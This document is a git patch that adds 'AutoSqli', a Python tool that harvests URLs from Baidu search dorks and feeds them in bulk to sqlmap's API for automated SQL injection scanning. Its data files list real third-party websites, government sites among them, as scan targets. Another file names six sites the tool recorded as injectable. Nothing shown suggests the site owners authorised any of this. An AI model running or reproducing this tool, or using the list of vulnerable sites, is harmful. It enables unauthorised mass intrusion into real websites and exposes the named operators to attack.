From 813f305db8fb23c5086487825a33517f730c5122 Mon Sep 17 00:00:00 2001
From: sowish <1546118682@qq.com>
Date: Sat, 14 Nov 2015 11:35:55 +0800
Subject: [PATCH] seconde commit

---
 AutoSqli.py         | 164 ++++++++++++++++++++++++++++++++++++++++++
 README              |   0
 data/injection.txt  |   6 ++
 data/targets.txt    |  20 ++++++
 keyword.txt         |   1 +
 search/__init__.py  |   0
 search/__init__.pyc | Bin 0 -> 129 bytes
 search/baidu.py     |  88 +++++++++++++++++++++++
 search/baidu.pyc    | Bin 0 -> 3362 bytes
 set_option.txt      | 172 ++++++++++++++++++++++++++++++++++++++++++++
 10 files changed, 451 insertions(+)
 create mode 100755 AutoSqli.py
 create mode 100644 README
 create mode 100755 data/injection.txt
 create mode 100755 data/targets.txt
 create mode 100755 keyword.txt
 create mode 100755 search/__init__.py
 create mode 100755 search/__init__.pyc
 create mode 100755 search/baidu.py
 create mode 100755 search/baidu.pyc
 create mode 100755 set_option.txt

diff --git a/AutoSqli.py b/AutoSqli.py
new file mode 100755
index 0000000..fb233f6
--- /dev/null
+++ b/AutoSqli.py
@@ -0,0 +1,164 @@
+#!/usr/bin/python
+#-*-coding:utf-8-*-
+import requests
+import time
+import json
+import threading
+import Queue
+from search.baidu import *
+
+
+class AutoSqli(object):
+
+    """
+    使用sqlmapapi的方法进行与sqlmapapi建立的server进行交互
+
+    """
+
+    def __init__(self, server='', target='',data = '',referer = '',cookie = ''):
+        super(AutoSqli, self).__init__()
+        self.server = server
+        if self.server[-1] != '/':
+            self.server = self.server + '/'
+        self.target = target
+        self.taskid = ''
+        self.engineid = ''
+        self.status = ''
+        self.data = data
+        self.referer = referer
+        self.cookie = cookie
+        self.start_time = time.time()
+
+    def task_new(self):
+        self.taskid = json.loads(
+            requests.get(self.server + 'task/new').text)['taskid']
+        #print 'Created new task: ' + self.taskid
+        if len(self.taskid) > 0:
+            return True
+        return False
+
+    def task_delete(self):
+        json_kill=requests.get(self.server + 'task/' + self.taskid + '/delete').text
+        # if json.loads(requests.get(self.server + 'task/' + self.taskid + '/delete').text)['success']:
+        #     #print '[%s] Deleted task' % (self.taskid)
+        #     return True
+        # return False
+
+    def scan_start(self):
+        headers = {'Content-Type': 'application/json'}
+        print "starting to scan "+ self.target +".................."
+        payload = {'url': self.target}
+        url = self.server + 'scan/' + self.taskid + '/start'
+        t = json.loads(
+            requests.post(url, data=json.dumps(payload), headers=headers).text)
+        self.engineid = t['engineid']
+        if len(str(self.engineid)) > 0 and t['success']:
+            #print 'Started scan'
+            return True
+        return False
+
+    def scan_status(self):
+        self.status = json.loads(
+            requests.get(self.server + 'scan/' + self.taskid + '/status').text)['status']
+        if self.status == 'running':
+            return 'running'
+        elif self.status == 'terminated':
+            return 'terminated'
+        else:
+            return 'error'
+
+    def scan_data(self):
+        self.data = json.loads(
+            requests.get(self.server + 'scan/' + self.taskid + '/data').text)['data']
+        if len(self.data) == 0:
+            #print 'not injection\t'
+            pass
+        else:
+            f=open('data/injection.txt','a')
+            f.write(self.target+'\n')
+            print 'injection \t'
+
+    def option_set(self):
+        headers = {'Content-Type': 'application/json'}
+        option = {"options": {
+                    "randomAgent": True,
+                    "tech":"BT"
+                    }
+                 }
+        url = self.server + 'option/' + self.taskid + '/set'
+        t = json.loads(
+            requests.post(url, data=json.dumps(option), headers=headers).text)
+        #print t
+
+    def scan_stop(self):
+        json_stop=requests.get(self.server + 'scan/' + self.taskid + '/stop').text
+        # json.loads(
+        #     requests.get(self.server + 'scan/' + self.taskid + '/stop').text)['success']
+
+    def scan_kill(self):
+        json_kill=requests.get(self.server + 'scan/' + self.taskid + '/kill').text
+        # json.loads(
+        #     requests.get(self.server + 'scan/' + self.taskid + '/kill').text)['success']
+
+    def run(self):
+        if not self.task_new():
+            return False
+        self.option_set()
+        if not self.scan_start():
+            return False
+        while True:
+            if self.scan_status() == 'running':
+                time.sleep(10)
+            elif self.scan_status() == 'terminated':
+                break
+            else:
+                break
+            #print time.time() - self.start_time
+            if time.time() - self.start_time > 500:
+                error = True
+                self.scan_stop()
+                self.scan_kill()
+                break
+        self.scan_data()
+        self.task_delete()
+        #print time.time() - self.start_time
+
+class myThread(threading.Thread):
+    def __init__(self,q,thread_id):
+        threading.Thread.__init__(self)
+        self.q=q
+        self.thread_id=thread_id
+    def run(self):
+        while not self.q.empty():
+            #print "threading "+str(self.thread_id)+" is running"
+            objects=self.q.get()
+            result=objects.run()
+
+
+        
+if __name__ == '__main__':
+    urls=[]
+    print 'the program starts!'
+    key='inurl:asp?id='
+    pages=3               
+    urls=geturl(key,pages)
+    #print urls
+    workQueue=Queue.Queue()
+    for tar in urls:
+        s = AutoSqli('http://127.0.0.1:8775', tar)
+        workQueue.put(s)
+    threads = []
+    nloops = range(4)   #threads Num
+    for i in nloops:
+        t = myThread(workQueue,i)
+        t.start()
+        threads.append(t)
+    for i in nloops:
+            threads[i].join()
+    print "Exiting Main Thread"
+
+
+
+
+    # t = AutoSqli('http://127.0.0.1:8775', 'http://www.changan-mazda.com.cn/market/runningmen/article.php?id=191')
+    # t.run()
diff --git a/README b/README
new file mode 100644
index 0000000..e69de29
diff --git a/data/injection.txt b/data/injection.txt
new file mode 100755
index 0000000..f2d6b7c
--- /dev/null
+++ b/data/injection.txt
@@ -0,0 +1,6 @@
+http://www.lamarche.com.tw/production_detail.php?shop_category=64&sn=248
+http://www.70jj.com/shop/index.php?shop_id=1
+http://www.cosmax.com.hk/products_detail.php?product_id=17
+http://www.etron.com/en/products/u3hc_detial.php?Product_ID=5
+http://www.fembooks.com.tw/indexstore.php?product_id=5423
+http://www.guangzhouflower.net.cn/product.php?pid=12
diff --git a/data/targets.txt b/data/targets.txt
new file mode 100755
index 0000000..77a81ea
--- /dev/null
+++ b/data/targets.txt
@@ -0,0 +1,20 @@
+http://www.99166.com/zjinfo.asp?id=5
+http://www.yh8z.com/Secondary/guding.asp?Id=68&Parent_ID=18&Type_Class=news&GS_Class=22
+http://www.gdkszx.com.cn/ksxx/kszc_show.asp?id=2205
+http://www.smxs.gov.cn/viewtexti.asp?id=275079&npage=6
+http://www.juancheng.gov.cn/wsbs-view.asp?id=9285
+http://rc.sz.zj.cn/company.asp?id=4291
+http://www.law-lib.com/fxj/fxj.asp?id=940
+http://www.kfws.gov.cn/Article_read.asp?id=2289
+http://www.zjghtcm.com/new_show.asp?id=1178
+http://www.medsci.cn/sci/journal.asp?id=0bc61099
+http://www.dylaw.gov.cn/zhongc/web60/classshow.asp?id=51848&classid=15
+http://club.kdnet.net/dispbbs.asp?id=11095423&boardid=1
+http://people.rednet.cn/PeopleShow.asp?ID=2410432
+http://www.dhzsxx.com/ShowNews.asp?id=1591
+http://www.chinawutong.com/co/huoyuan_01/index.asp?id=213633
+http://news.chinaxinge.com/shownews.asp?id=53866&sjm=49600b363e048e05
+http://www.gxxgty.com/news_show.asp?id=1583
+http://szb.keq0475.com/Qnews.asp?ID=49506
+http://www.cyfy.cn/kssz.asp?id=42
+http://www.szkweekly.com/List.asp?ID=54284
diff --git a/keyword.txt b/keyword.txt
new file mode 100755
index 0000000..3696fbf
--- /dev/null
+++ b/keyword.txt
@@ -0,0 +1 @@
+site:.hk inurl:.php?
\ No newline at end of file
diff --git a/search/__init__.py b/search/__init__.py
new file mode 100755
index 0000000..e69de29
diff --git a/search/__init__.pyc b/search/__init__.pyc
new file mode 100755
index 0000000000000000000000000000000000000000..1de5cdfe2919090576af51f2a34a76b34eb355b6
GIT binary patch
literal 129
zcmZSn%**vFLq05-0SXv_v;z<qvjB+{28Lh_kcgiKkYGR~inV}Zu2wPU-yPW>Q(Tyn
zSdbZW^w+`t*B7059aEf|Sd^R*6Ca<Mmst`YuUAl6!U0rnlbfGXnv-e=GPD?o833Xr
BAD93D

literal 0
HcmV?d00001

diff --git a/search/baidu.py b/search/baidu.py
new file mode 100755
index 0000000..fda1213
--- /dev/null
+++ b/search/baidu.py
@@ -0,0 +1,88 @@
+#coding: utf-8
+import urllib2
+import string
+import urllib
+import re
+import random
+  
+user_agents = ['Mozilla/5.0 (Windows NT 6.1; WOW64; rv:23.0) Gecko/20130406 Firefox/23.0', \
+        'Mozilla/5.0 (Windows NT 6.1; WOW64; rv:18.0) Gecko/20100101 Firefox/18.0', \
+        'Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/533+ \
+        (KHTML, like Gecko) Element Browser 5.0', \
+        'IBM WebExplorer /v0.94', 'Galaxy/1.0 [en] (Mac OS X 10.5.6; U; en)', \
+        'Mozilla/5.0 (compatible; MSIE 10.0; Windows NT 6.1; WOW64; Trident/6.0)', \
+        'Opera/9.80 (Windows NT 6.0) Presto/2.12.388 Version/12.14', \
+        'Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) \
+        Version/6.0 Mobile/10A5355d Safari/8536.25', \
+        'Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) \
+        Chrome/28.0.1468.0 Safari/537.36', \
+        'Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.0; Trident/5.0; TheWorld)']
+  
+def baidu_search(keyword,pn):
+    p= {'wd': keyword} 
+    res=urllib2.urlopen(("http://www.baidu.com/s?"+urllib.urlencode(p)+"&pn={0}&cl=3&rn=10").format(pn)) #rn为每页的显示数目 pn表示当前显示的是第pn条搜索结果
+    html=res.read()
+    return html
+def getList(regex,text): #将获取的url去重并存入list
+    arr = []
+    res = re.findall(regex, text)
+    if res:
+        for r in res:
+            arr.append(r)
+    return arr
+def getMatch(regex,text):  #匹配函数
+    res = re.findall(regex, text)
+    if res:
+        return res[0]
+    return ''
+def is_get(url):           #是否是sqlmap可识别的get型链接
+    regex=r'(\S*?)\?.*=.*'
+    res=re.match(regex,url)
+    if res:
+        #print res.group(1)
+        return res.group(1)
+    else:
+        return 0
+# def Deduplication():
+#     regex=r'\S'
+
+def geturl(keyword,pages): #获取url
+    targets = []
+    hosts=[]
+    for page in range(0,int(pages)):
+        pn=(page+1)*10
+        html = baidu_search(keyword,pn)   
+        content = unicode(html, 'utf-8','ignore')
+        arrList = getList(u"<div class=\"f13\">(.*)</div>", content) #分割页面块
+        #print arrList
+        # f2=open('content.txt','a')
+        # f2.write(str(arrList)+'\n')#调试使用，获取内容
+        # f2.close()
+        for item in arrList:
+            regex = u"data-tools='\{\"title\":\"(.*)\",\"url\":\"(.*)\"\}'"
+            link = getMatch(regex,item)
+            url=link[1]                     #获取百度改写url
+            try: 
+                domain=urllib2.Request(url)
+                r=random.randint(0,11)
+                domain.add_header('User-agent', user_agents[r])
+                domain.add_header('connection','keep-alive')
+                response=urllib2.urlopen(domain)
+                uri=response.geturl()      #获取真实url
+                urs=is_get(uri)            #是否是传统的get型
+                if (uri in targets) or (urs in hosts) :
+                    continue
+                else:
+                    targets.append(uri)
+                    hosts.append(urs)
+                    f1=open('data/targets.txt','a') #存放url链接
+                    f1.write(uri+'\n')
+                    f1.close()
+            except:
+                continue
+    print "urls have been grabed already!!!"
+    return targets
+    
+
+
+    
\ No newline at end of file
diff --git a/search/baidu.pyc b/search/baidu.pyc
new file mode 100755
index 0000000000000000000000000000000000000000..3f168e1de68db62e9d37a2a807f0d1e18775c94a
GIT binary patch
literal 3362
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

literal 0
HcmV?d00001

diff --git a/set_option.txt b/set_option.txt
new file mode 100755
index 0000000..0fa46a7
--- /dev/null
+++ b/set_option.txt
@@ -0,0 +1,172 @@
+{
+    "options": {
+        "crawlDepth": null, 
+        "osShell": false, 
+        "getUsers": false, 
+        "getPasswordHashes": false, 
+        "excludeSysDbs": false, 
+        "uChar": null, 
+        "regData": null, 
+        "cpuThrottle": 5, 
+        "prefix": null, 
+        "code": null, 
+        "googlePage": 1, 
+        "query": null, 
+        "randomAgent": false, 
+        "delay": 0, 
+        "isDba": false, 
+        "requestFile": null, 
+        "predictOutput": false, 
+        "wizard": false, 
+        "stopFail": false, 
+        "forms": false, 
+        "taskid": "73674cc5eace4ac7", 
+        "skip": null, 
+        "dropSetCookie": false, 
+        "smart": false, 
+        "risk": 1, 
+        "sqlFile": null, 
+        "rParam": null, 
+        "getCurrentUser": false, 
+        "notString": null, 
+        "getRoles": false, 
+        "getPrivileges": false, 
+        "testParameter": null, 
+        "tbl": null, 
+        "charset": null, 
+        "trafficFile": null, 
+        "osSmb": false, 
+        "level": 1, 
+        "secondOrder": null, 
+        "pCred": null, 
+        "timeout": 30, 
+        "firstChar": null, 
+        "updateAll": false, 
+        "binaryFields": false, 
+        "checkTor": false, 
+        "aType": null, 
+        "direct": null, 
+        "saFreq": 0, 
+        "tmpPath": null, 
+        "titles": false, 
+        "getSchema": false, 
+        "identifyWaf": false, 
+        "checkWaf": false, 
+        "regKey": null, 
+        "limitStart": null, 
+        "loadCookies": null, 
+        "dnsName": null, 
+        "csvDel": ",", 
+        "oDir": null, 
+        "osBof": false, 
+        "invalidLogical": false, 
+        "getCurrentDb": false, 
+        "hexConvert": false, 
+        "answers": null, 
+        "host": null, 
+        "dependencies": false, 
+        "cookie": null, 
+        "proxy": null, 
+        "regType": null, 
+        "optimize": false, 
+        "limitStop": null, 
+        "mnemonics": null, 
+        "uFrom": null, 
+        "noCast": false, 
+        "testFilter": null, 
+        "eta": false, 
+        "threads": 1, 
+        "logFile": null, 
+        "os": null, 
+        "col": null, 
+        "rFile": null, 
+        "verbose": 1, 
+        "aCert": null, 
+        "torPort": null, 
+        "privEsc": false, 
+        "forceDns": false, 
+        "getAll": false, 
+        "api": true, 
+        "url": null, 
+        "invalidBignum": false, 
+        "regexp": null, 
+        "getDbs": false, 
+        "freshQueries": false, 
+        "uCols": null, 
+        "smokeTest": false, 
+        "pDel": null, 
+        "wFile": null, 
+        "udfInject": false, 
+        "tor": false, 
+        "forceSSL": false, 
+        "beep": false, 
+        "saveCmdline": false, 
+        "configFile": null, 
+        "scope": null, 
+        "dumpAll": false, 
+        "torType": "HTTP", 
+        "regVal": null, 
+        "dummy": false, 
+        "commonTables": false, 
+        "search": false, 
+        "skipUrlEncode": false, 
+        "referer": null, 
+        "liveTest": false, 
+        "purgeOutput": false, 
+        "retries": 3, 
+        "extensiveFp": false, 
+        "dumpTable": false, 
+        "database": "/tmp/sqlmapipc-EmjjlQ", 
+        "batch": true, 
+        "headers": null, 
+        "flushSession": false, 
+        "osCmd": null, 
+        "suffix": null, 
+        "dbmsCred": null, 
+        "regDel": false, 
+        "shLib": null, 
+        "nullConnection": false, 
+        "timeSec": 5, 
+        "msfPath": null, 
+        "noEscape": false, 
+        "getHostname": false, 
+        "sessionFile": null, 
+        "disableColoring": true, 
+        "getTables": false, 
+        "agent": null, 
+        "lastChar": null, 
+        "string": null, 
+        "dbms": null, 
+        "tamper": null, 
+        "hpp": false, 
+        "runCase": null, 
+        "osPwn": false, 
+        "evalCode": null, 
+        "cleanup": false, 
+        "getBanner": false, 
+        "profile": false, 
+        "regRead": false, 
+        "bulkFile": null, 
+        "safUrl": null, 
+        "db": null, 
+        "dumpFormat": "CSV", 
+        "alert": null, 
+        "user": null, 
+        "parseErrors": false, 
+        "aCred": null, 
+        "getCount": false, 
+        "dFile": null, 
+        "data": null, 
+        "regAdd": false, 
+        "ignoreProxy": false, 
+        "getColumns": false, 
+        "mobile": false, 
+        "googleDork": null, 
+        "sqlShell": false, 
+        "pageRank": false, 
+        "tech": "BEUSTQ", 
+        "textOnly": false, 
+        "commonColumns": false, 
+        "keepAlive": false
+    }
+}